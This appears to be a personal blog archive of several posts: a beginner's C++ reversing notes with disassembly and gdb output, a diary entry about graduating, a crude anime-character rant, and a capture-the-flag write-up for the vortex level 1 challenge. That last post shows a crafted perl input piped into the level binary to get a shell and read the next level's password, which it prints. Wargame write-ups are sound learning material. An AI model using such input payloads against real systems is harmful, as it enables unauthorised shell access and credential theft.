in the name of zero

i’ve decided to ditch java and tackle c++ and c# this summer!

by some malevolent influence yesterday, i found myself looking for c plus plus object oriented programming tutorials. i made steady progress for a few minutes until after my nth compilation. got sidetracked when i realized that i haven’t actually encountered any c++ crackmes at the usual place.

so i’m posting my experiments here in the hopes of finding someone to point me to some related articles on the subject matter.

void __attribute__ ((constructor)) myctor()
{
        cout<<"--- little red riding hood goes to the farm ---\n";
}
	
void __attribute__ ((destructor)) mydtor()
{
        cout<<"--- little red riding hood  goes home ---\n";
}
	
class sheep {
        int offspring;
	
        public:
                sheep(void);
                sheep(int);
                ~sheep(void);
                int get_offspring(void);
};
	
sheep::sheep(void)
{
        offspring = 0;
}
	
sheep::sheep(int x)
{
        cout<<"mommy sheep is having sex with daddy sheep\n";
        offspring = x;
}
	
sheep::~sheep(void)
{
        cout<<"mommy sheep dies after giving birth\n";
}
	
int sheep::get_offspring(void)
{
        return offspring;
}
	
int main(int t, char **c)
{
        sheep philippine_sheep(5);
	
        cout<<"they have "<<philippine_sheep.get_offspring()<<" babies\n";
	
        cout<<"\n\tgoddamn i feel like a chump!\n";
	
        return 0;
}

“so what’s it like under the hood?” i was curious so i peeked a little.

the first thing i noticed (thru “strings”) is that it uses libstdc++.so and not libc.so it’s rather easy to figure out judging from the filenames alone. then from what i saw at objdump, the procedure linkage table is totally different from that of a c binary. it also bother me a bit that i couldn’t find “cout” anywhere… i moved along. (i discovered something about it later though)

before going further, i used objdump –demangle to make reading more convenient.

entry startup is familiar as it’s still the usual libc startup i’ve encountered many times. push registers, envp, argv, argc .. and then jump to libc_start_main(). before jumping to main(), i browsed a little bit and saw the disassembly of the class methods i made. so far so good.

my first question goes how come there are two (2) declarations of each method!? disassembly below:

0804881c <sheep::sheep()>:
 804881c:       55                      push   ebp
 804881d:       89 e5                   mov    ebp,esp
 804881f:       8b 45 08                mov    eax,DWORD PTR [ebp+8]
 8048822:       c7 00 00 00 00 00       mov    DWORD PTR [eax],0x0
 8048828:       c9                      leave
 8048829:       c3                      ret    
	
0804882a <sheep::sheep()>:
 804882a:       55                      push   ebp
 804882b:       89 e5                   mov    ebp,esp
 804882d:       8b 45 08                mov    eax,DWORD PTR [ebp+8]
 8048830:       c7 00 00 00 00 00       mov    DWORD PTR [eax],0x0
 8048836:       c9                      leave
 8048837:       c3                      ret    

this is where it started getting interesting.

instantiating a class seems like lots of work. in my program, i used the overloaded constructor which takes an int parameter.

 ; sheep philippine_sheep(5);
	
 80487de:       6a 05                   push   0x5		; constructor argument
 80487e0:       8d 45 e8                lea    eax,[ebp-24]	; addr of object
 80487e3:       50                      push   eax		; push addr of object as well
 80487e4:       e8 75 ff ff ff          call   804875e <sheep::sheep(int)> ; call the class constructor. (right?)
 

i followed sheep::sheep(int) … again, there are two declarations of this.

0804875e <sheep::sheep(int)>:
 804875e:       55                      push   ebp
 804875f:       89 e5                   mov    ebp,esp		; prolog
 8048761:       83 ec 08                sub    esp,0x8
 8048764:       83 ec 08                sub    esp,0x8		; 0x10 space
 8048767:       68 c0 8a 04 08          push   0x8048ac0	; "mommy sheep is having sex..."
 804876c:       68 b8 9e 04 08          push   0x8049eb8	; cout@glibcpp
 8048771:       e8 5a fe ff ff          call   80485d0		; std::basic_ostream....
 8048776:       83 c4 10                add    esp,0x10		; cleanup
 8048779:       8b 55 08                mov    edx,DWORD PTR [ebp+8]	; main() local var...
 804877c:       8b 45 0c                mov    eax,DWORD PTR [ebp+12]	; constructor argument (5)
 804877f:       89 02                   mov    DWORD PTR [edx],eax	; save it inside the object
 8048781:       c9                      leave  				; epilog
 8048782:       c3                      ret    				; return to callee
 8048783:       90                      nop				; no operation

i learned two things here. first is that i found out that “cout” is not being called directly. (perhaps other functions as well)

Disassembly of section .bss:
	
08049eb8 <std::cout@@GLIBCPP_3.2>:

the second is how an object’s variables are being handled (basically). to verify, i ran gdb.

gdb $ hb *0x080487e4
	
gdb $ r
--- little red riding hood goes to the farm ---
Breakpoint 1, 0x080487e4 in main ()
	
gdb $ nexti
mommy sheep is having sex with daddy sheep
0x080487e9 in main ()
	
gdb $ reg
     eax:00000005 ebx:B7EE0FF4  ecx:0000000A  edx:BFFE9450     eflags:00000282
     esi:B7FEDC80 edi:BFFE94C4  esp:BFFE9430  ebp:BFFE9468     eip:080487E9
     cs:0073  ds:007B  es:007B  fs:0000  gs:0000  ss:007B    o d I t S z a p c 
	
gdb $ x/x $edx
0xbffe9450:     0x00000005

i guess that wraps my first few steps in larning object oriented programming. will post more as soon as able.

i’m fresh outta college and currently enjoying freedom. (mostly because it took me six years to get through) many of my classmates have said their goodbyes. some have already left carrying with them the promise of employment and all the luxuries and benefits that come with the degree they recently got. at this point though, i’m pretty certain that i won’t be using the calculus and advanced math concepts i learned from school. also the chemistry and some of the physics concepts.

looking at my graduation again this time with my hormones in check, i feel kinda sad that school’s over. afterall, university is the only pace in this city where you can find high quality chicks! usually comes in three flavors:

a) one with all the beauty… and rich.
b) one with all the brains… and rich.
c) one with both all the beauty and all the brains and above all… rich.

that’s that.

for the most part, i’m just slacking off these days, just watching full anime seasons everyday. sometimes, i walk (on my usual route) to the internet cafe near my school to play DoTA. quickly becoming a daily routine if you ask me.

faced with the prospect of getting work soon, my original plan was to make easy money by becoming a call center agent in some company some place up north. actually, i’m still entertained by that idea until now. recruitments will be held this coming april and me and my friends agreed that we’d give it a shot. afterall, the only important requirement is to be “able to speak functional english”.

summer also means that i must again take up a new hobby and/or continue my old ones. usually, i settle for learning a new programming language (of my liking) and doing some fun stuffs with my chosen PL.

coz no one wants a C guy nowadays… i’m practically screwed. so again with the prospect of getting work, i’m giving learning java and “some of the bullshit that comes with it” a shot. that is where the money is “apparently” nowadays. or so i think.

i guess she’s finishing up packing her stuff as i’m typing this entry. she’s going to cebu for a job interview and the thought about not seeing her again and missing her kicked in kinda late. i’m such an asshole.

thinking about her brings back vivid memories of our trip to cagayan! it’s a story i’ll be sure to tell my grandsons if i’ll have any…

this is niel. signing off.

female characters who can’t seem to handle their own feelings screw up a good story’s mood.

exhibit a - chiharu (boys be)

high school love turned sour. apparently, they still remained friends. or at least that’s what i think after the season’s last episode. i hate her.

exhibit b - oboro (kouga ninja scrolls)

oboro was from the iga ninja clan. in the anime version (basilisk), her eyes were known as the “ninja spell breaking eyes”. no form of ninjutsu can work against her. using a ninja technique on her proved to be fatal for the caster. her lover on the other hand also has special eyes. kouga gennosuke of the kouga ninja clan. in the anime version, he is able to use the enemies’ techniques (physical or ninjutsus) against themselves. just by staring at them. at the end of the story, the guy (gennosuke) let oboro win. i hate her.

exhibit d - mikumari (samurai 7)

i hate her.

exhibit e - xiao long nu (return of condor heroes 2006)

acted by “crystal” liu yi fei.

very cute. very pretty. very sexy. godlike gracefulness. excellent martial arts. but she gave yang guo heartaches so painful, it will make even the devil cry. i’m also tempted to say “i hate her”, but (altogether now) very cute. very pretty. very sexy.

exhibit f - so seo no (ju mong)

acted by han hye jin.

now, here’s a girl who’s strong. she’s got the business skills to rival bill gates. seriously. then she began showing signs of weakness later on. she married wu tae to avoid marriage with dae so but she loved ju mong deep down.

i finally finished watching the entire season’s last episode ten minutes ago, and i must say, all that drama about “self exile” and giving way to the rightful “first wife” (ye so ya) was abso-fucking-lutely unecessary. i still haven’t made up my mind if i hate her or not.

so is there any female character out there who’s not pathetic? yup! lacus klein - gundam seed.

thanks for your time.

the concepts presented, i guess are common knowledge… but the answers elude me somehow. (and listening to Metallica Music doesn’t help for some reason.)

f*ck!

consider the following:

/* shitprog.c */
	
#include 
#include 
	
int main(t, c)
{
	execlp("/bin/sh", "sh", "-i", NULL)
	return 0;
}

fairly easy to figure out you don’t you agree?

now for some output:

misha@heaven ~ $ ./shitprog
sh-3.00$ 

as expected. we have a shell! next, let’s try passing commands to the shell via stdin.

misha@heaven ~ $ echo "whoami" | ./shitprog
sh-3.00$ misha
sh-3.00$ exit

still working as expected so far…

to further build my case, let’s try messing with stdin before calling execlp() shall we? (i used getchar())

/* anothershitprog.c */
	
#include 
#include 
	
int main(t, c)
{
	getchar();
	
	execlp("/bin/sh", "sh", "-i", NULL)
	return 0;
}

again, let’s try running it.

misha@heaven ~ $ ./anothershitprog
f
sh-3.00$

this time, the program waits for me to press a key then the execlp() resolves…

so how about a command via stdin like what we did before?

misha@heaven ~ $ echo "whoami" | ./anothershitprog
sh-3.00$ exit

what the fuck!? it just exits!

i finally solved the problem by writing a 4096 byte garbage immediately preceeding my “command”, like so:

misha@heaven ~ $ echo $(perl -e 'print "a"x4096, "whoami"') | ./anothershitprog
sh-3.00$ misha
sh-3.00$ exit

i tried this same method in pulltheplug.org’s level 2 vortex challenge , but was not as succesfull. the “pad to 4096″ trick doesn’t work.

luckily… the number of “/” infront of a command doesn’t make any difference. so /bin/ls is the same as ///////////bin/ls.

so this is how my session went:

level1@vortex ~ $ echo $(perl -e 'print "\\"x257,"\xca","/"x3838, "bin/cat /etc/pass/level2"') | /levels/level1
sh-3.1$ 23anbT\rE
sh-3.1$ exit

that’s how i got the pass for level 2.

anyone care to fill me in with the gray areas? it’s 12:38 am and i’m totally wasted.